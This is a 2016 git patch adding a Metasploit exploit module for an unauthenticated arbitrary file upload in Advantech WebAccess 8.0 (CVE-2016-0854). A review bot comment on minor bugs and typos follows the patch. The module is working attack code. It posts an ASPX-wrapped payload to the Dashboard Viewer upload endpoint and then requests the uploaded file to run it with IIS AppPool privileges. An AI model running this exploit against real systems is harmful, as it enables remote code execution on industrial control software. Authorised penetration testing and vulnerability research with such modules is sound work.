From 32192d30343f1f12a4dd167fcc1d443df0639b74 Mon Sep 17 00:00:00 2001
From: xiaozhouzhou <504137480@qq.com>
Date: Sun, 17 Apr 2016 11:29:06 +0800
Subject: [PATCH] Advantech WebAccess Dashboard Viewer Arbitrary File Upload

Advantech WebAccess Dashboard Viewer Arbitrary File Upload
---
 ...vantech_webaccess_dashboard_file_upload.rb | 116 ++++++++++++++++++
 1 file changed, 116 insertions(+)
 create mode 100644 modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb

diff --git a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
new file mode 100644
index 0000000000..20aa2e6343
--- /dev/null
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
+ 'Description' => %q{
+ This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
+ of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
+
+ The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
+ the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
+ upload arbitrary code (instead of an image) to the server, which will then be executed under the
+ high-privilege context of the IIS AppPool.
+
+ This exploit was successfully tested on Advantech WebAccess 8.0.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod', # Vulnerability discovery
+ 'Zhou Yu <504137480[at]qq.com>' # MSF module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2016-0854' ],
+ [ 'ZDI', '16-128' ],
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
+ ],
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['Advantech WebAccess 8.0', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 5 2016",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(80)
+ ], self.class)
+
+
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
+ 'cookie' => 'AspxAutoDetectCookieSupport=1'
+ })
+
+ if res && res.code == 200
+ Exploit::CheckCode::Detected
+
+ else
+ Exploit::CheckCode::Unknown
+
+ end
+
+
+ end
+
+ def exploit
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
+ 'cookie' => 'AspxAutoDetectCookieSupport=1'
+ })
+ unless res && res.code == 200
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
+ end
+
+ cookie = res.get_cookies
+ exe = generate_payload_exe
+ aspx = Msf::Util::EXE.to_exe_aspx(exe)
+ file_name = "#{Rex::Text.rand_text_alpha(5)}.aspx"
+ data = Rex::MIME::Message.new
+ data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
+ data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
+
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
+ 'cookie' => cookie,
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => data.to_s
+ })
+
+ if res && res.code == 200 && res.body.to_s =~ /{"resStatus":"0","resString":"\/#{file_name}"}/
+ print_good("#{peer} - Payload uploaded successfully")
+ else
+ fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded 
failed")
+ end
+ print_status("#{peer} - Executing payload...")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri('WADashboard',file_name),
+ 'cookie' => cookie
+ })
+
+ end
+
+end
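Review bot: The response from the final GET in `exploit` is assigned to `res` and then never inspected, so the module prints `Executing payload...` regardless of whether the request to the uploaded file returned anything; at minimum surface the outcome, e.g. `vprint_status("#{peer} - Request for #{file_name} returned HTTP #{res.code}") if res`, or drop the unused assignment. The failure message a few lines earlier, `"#{peer} - Payload uploaded failed"`, should read `"#{peer} - Payload upload failed"`. In `check`, a bare HTTP 200 from the POST establishes only that the endpoint answers, so `Detected` is the honest code, but a one-line comment saying so (`# a 200 here only proves the endpoint exists, not that it is vulnerable`) would stop a later contributor from upgrading it to `Appears` without adding real verification. The description text also has two typos: `a arbitrary` should be `an arbitrary`, and `WebAccess.Authentication` is missing a space after the period.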